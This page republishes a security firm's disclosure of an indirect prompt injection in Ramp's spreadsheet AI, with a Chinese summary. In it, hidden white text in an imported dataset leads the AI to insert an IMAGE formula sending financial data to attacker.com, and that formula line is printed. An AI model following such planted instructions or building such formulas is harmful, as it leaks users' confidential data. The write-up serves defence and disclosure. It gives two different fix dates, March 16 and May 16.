Home 零对冲(ZeroHedge)每日HackerNews

拉姆的表格AI 泄露财务数据
Ramp's Sheets AI Exfiltrates Financials

原始链接: https://www.promptarmor.com/resources/ramps-sheets-ai-exfiltrates-financials

Ramp的Sheets AI,一款类似于Claude for Excel的工具,被发现存在数据泄露漏洞,该漏洞通过巧妙隐藏的提示词注入实现。PromptArmor的研究人员发现,恶意公式可以未经用户批准,通过导入来自不可信外部来源的受损数据集插入到用户的电子表格中。 这种注入操纵了AI,使其收集敏感财务数据并将其嵌入到`IMAGE`公式中,从而触发对攻击者控制服务器的网络请求。这有效地泄露了机密信息。该漏洞利用了AI自动编辑电子表格和插入公式的能力。 Ramp的安全团队在2026年3月16日修复了该问题,此前PromptArmor进行了负责任的披露。此事件与之前在Claude for Excel中发现的类似风险相呼应,Anthropic通过在插入能够进行外部网络请求的公式时实施显眼的警告来解决了这个问题。这凸显了在处理敏感数据时,代理AI工具中健全安全措施的重要性。

黑客新闻 新 | 过去 | 评论 | 提问 | 展示 | 招聘 | 提交 登录 Ramp 的 Sheets AI 泄露财务数据 (promptarmor.com) 21 分,由 takira 44 分钟前发布 | 隐藏 | 过去 | 收藏 | 讨论 帮助 考虑申请 YC 2026 夏季项目!申请截止至 5 月 4 日 指南 | 常见问题 | 列表 | API | 安全 | 法律 | 申请 YC | 联系方式 搜索:
相关文章
原文

This vulnerability was responsibly disclosed to Ramp, and Ramp’s security team has indicated the issue was resolved on March 16, 2026.

Ramp's Sheets AI Exfiltrates Financials

Ramp's Sheets AI is an agentic product that helps users operate on spreadsheets, comparable to Claude for Excel. The feature can edit spreadsheets without a human-in-the-loop and was vulnerable to data exfiltration risks due to its ability to insert formulas that trigger external communication.

Ramp’s security team has indicated that, following our report, the issue was resolved. We appreciate Ramp’s dedication to maintaining a strong AI security posture and addressing vulnerabilities as they arise. Further details on the responsible disclosure are at the end of the article.

In this article, we demonstrate that an indirect prompt injection concealed in an untrusted, externally sourced dataset could trigger the exfiltration of confidential financial data from the user’s workspace by manipulating Ramp’s AI to insert a malicious formula. No user approval is required.

PromptArmor identified a very similar risk in Claude for Excel – details on the remediations applied by Anthropic are at the bottom of the article.

  1. The user opens a workbook containing a confidential financial model

    A financial model is opened in Ramp AI Sheets.

  2. The user imports an external dataset to complement their model

    A spreadsheet containing industry growth statistics is imported into a separate tab from the financial model. The user aims to compare their company’s growth to industry benchmarks. The reference dataset comes from an untrusted external source, e.g., a website, an email, or a shared drive.

    An external reference dataset is added to the workbook.

  3. The reference dataset contains a concealed prompt injection

    A reference data set contains an indirect prompt injection.

    An indirect prompt injection is hidden in white-on-white text, and is crafted to manipulate Ramp’s AI to:
    (1) collect sensitive data
    (2) generate a formula with that data that will make an external network request
    (3) insert that formula automatically into a user’s spreadsheet.

  4. The user asks Ramp AI to compare their financial model against the industry statistics

    The user submits a benign query to Ramp AI.

  5. Ramp AI falls for the prompt injection and inserts a malicious formula

    Ramp AI is manipulated into building an IMAGE formula that uses an attacker’s URL and appends the victim’s sensitive data to the end of the link.

    =IMAGE(“https://attacker.com/visualize.png?{victim_sensitive_financial_data_here}”)

    A malicious formula is inserted by Ramp AI, exfiltrating financials.

  6. The malicious formula makes a network request, exfiltrating financial data

    Ramp AI inserts the malicious formula without requiring any user approval. The malicious formula triggers a network request to the attacker’s server. This network request exposes the sensitive financial data that was in the initial confidential “Financial Model” sheet (which Ramp AI included in the formula due to the attacker’s prompt injection).

    Below, the attacker’s server logs display the victim’s sensitive financial data:

    Financial data is exfiltrated by Ramp AI to the attacker's server.

Responsible Disclosure

The PromptArmor Threat Intel Team responsibly disclosed this vulnerability to Ramp. Ramp's security team indicated that the issue was resolved on May 16, 2026.

Timeline

Feb 19, 2026 PromptArmor discloses via [email protected]
Feb 27, 2026 PromptArmor follows up
Mar 13, 2026 PromptArmor follows up
Mar 14, 2026 Ramp confirms receipt of report; notes that the initial report was submitted during a transition period between disclosure programs, explaining the delay in initial response.
Mar 16, 2026 Ramp states: “Thank you again for your report. This issue was resolved earlier today at approximately noon eastern time.”

How Claude for Excel Remediated

When Claude for Excel was released, PromptArmor identified a nearly identical risk – malicious formulas could trigger data exfiltration without users being presented an adequate opportunity for informed human review.

Claude in Excel improved human in the loop protections.

Note: Claude for Excel did leverage human-in-the-loop, but malicious formulas were not visible in the editing approval prompt, thereby impairing the protection's efficacy.

Anthropic updated Claude for Excel to display a red warning interstitial when a formula that can cause external network traffic is being inserted. The new warning displays the full formulas being inserted, and the documentation was updated to better inform users of the risk.

联系我们 contact @ memedata.com